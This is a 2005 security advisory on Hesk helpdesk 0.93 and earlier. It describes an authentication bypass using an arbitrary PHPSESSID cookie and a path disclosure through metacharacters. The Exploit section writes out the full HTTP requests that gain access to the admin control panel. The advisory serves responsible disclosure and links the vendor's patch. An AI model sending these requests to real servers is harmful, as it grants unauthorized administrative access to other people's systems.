OS2A
Hesk Session ID Validation Vulnerability
OS2A ID: OS2A_1003 Status
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released
Class: Authentication Bypass Severity: CRITICAL
Overview:
Hesk is a PHP based help desk software that runs with a MySQL database.
It allows to setup a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused due to improper validation of the HTTP
header. This vulnerability can be exploited to bypass authentication
mechanism, and also made to reveal system specific information.
Description:
Multiple vulnerabilities exist in Hesk ticket based support system.
1. Authentication Bypass
The 'PHPSESSID', Session ID parameter in the HTTP header is not properly
validated. A malicious user can log in to the Administrator account by
sending a random value to 'PHPSESSID' parameter and posting it to
admin.php. This Session ID can then be utilized to access administrative
control panel.
This is similar to a previously reported vulnerability where invalid
User ID and Password were submitted. In this case, a randomly chosen
Session ID is sent along with the login request.
2. Path Disclosure.
Path information can be made to disclose in error pages by passing invalid
metacharacters such as "'" or "<" to 'PHPSESSID' field of the HTTP header.
Impact:
Successful exploitation can result in a compromise of the application,
disclosure of system specific information.
Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)
Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://host_ip/hesk/admin.php
Cookie: PHPSESSID=12345 <!-- Random Session ID --!>
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");
2. GET request to administrative control panel:
GET admin_main.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345") <!-- Session ID --!>
Solutions:
Patch:
http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
OR Hesk 0.93.1 from
http://www.phpjunkyard.com/free-helpdesk-software.php
Credits:
Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A have discovered
the vulnerability
